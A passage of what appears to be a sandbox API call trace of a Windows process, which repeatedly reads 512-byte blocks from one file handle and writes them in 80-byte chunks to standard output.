_get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] GetFileType (hFile=0x50) returned 0x1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] GetFileType (hFile=0x50) returned 0x1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] GetFileType (hFile=0x50) returned 0x1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.931] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.931] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.931] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.931] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] GetFileType (hFile=0x50) returned 0x1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] GetFileType (hFile=0x50) returned 0x1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] GetFileType (hFile=0x50) returned 0x1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] GetFileType (hFile=0x50) returned 0x1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] GetFileType (hFile=0x50) returned 0x1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] GetFileType (hFile=0x50) returned 0x1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] GetFileType (hFile=0x50) returned 0x1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] GetFileType (hFile=0x50) returned 0x1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.932] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.932] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.932] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.932] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] GetFileType (hFile=0x50) returned 0x1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] GetFileType (hFile=0x50) returned 0x1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] GetFileType (hFile=0x50) returned 0x1 [0128.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] GetFileType (hFile=0x50) returned 0x1 [0128.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] GetFileType (hFile=0x50) returned 0x1 [0128.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] GetFileType (hFile=0x50) returned 0x1 [0128.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] GetFileType (hFile=0x50) returned 0x1 [0128.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] GetFileType (hFile=0x50) returned 0x1 [0128.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.933] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.934] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.934] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.934] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.934] GetFileType (hFile=0x50) returned 0x1 [0128.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.934] GetFileType (hFile=0x50) returned 0x1 [0128.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.934] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.934] GetFileType (hFile=0x50) returned 0x1 [0128.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.934] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.934] GetFileType (hFile=0x50) returned 0x1 [0128.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.934] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.934] GetFileType (hFile=0x50) returned 0x1 [0128.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.934] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.934] GetFileType (hFile=0x50) returned 0x1 [0128.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.934] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] GetFileType (hFile=0x50) returned 0x1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] GetFileType (hFile=0x50) returned 0x1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.935] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.935] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.935] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.935] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] GetFileType (hFile=0x50) returned 0x1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] GetFileType (hFile=0x50) returned 0x1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] GetFileType (hFile=0x50) returned 0x1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] GetFileType (hFile=0x50) returned 0x1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] GetFileType (hFile=0x50) returned 0x1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] GetFileType (hFile=0x50) returned 0x1 [0128.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] GetFileType (hFile=0x50) returned 0x1 [0128.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] GetFileType (hFile=0x50) returned 0x1 [0128.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.936] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.936] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.936] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.936] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] GetFileType (hFile=0x50) returned 0x1 [0128.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] GetFileType (hFile=0x50) returned 0x1 [0128.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] GetFileType (hFile=0x50) returned 0x1 [0128.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] GetFileType (hFile=0x50) returned 0x1 [0128.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] GetFileType (hFile=0x50) returned 0x1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] GetFileType (hFile=0x50) returned 0x1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] GetFileType (hFile=0x50) returned 0x1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] GetFileType (hFile=0x50) returned 0x1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.937] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.937] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.937] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.937] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] GetFileType (hFile=0x50) returned 0x1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] GetFileType (hFile=0x50) returned 0x1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] GetFileType (hFile=0x50) returned 0x1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] GetFileType (hFile=0x50) returned 0x1 [0128.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.937] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] GetFileType (hFile=0x50) returned 0x1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] GetFileType (hFile=0x50) returned 0x1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] GetFileType (hFile=0x50) returned 0x1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] GetFileType (hFile=0x50) returned 0x1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.938] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.938] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.938] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.938] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] GetFileType (hFile=0x50) returned 0x1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] GetFileType (hFile=0x50) returned 0x1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] GetFileType (hFile=0x50) returned 0x1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] GetFileType (hFile=0x50) returned 0x1 [0128.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.938] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] GetFileType (hFile=0x50) returned 0x1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] GetFileType (hFile=0x50) returned 0x1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] GetFileType (hFile=0x50) returned 0x1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.939] GetFileType (hFile=0x50) returned 0x1 [0128.939] _get_osfhandle 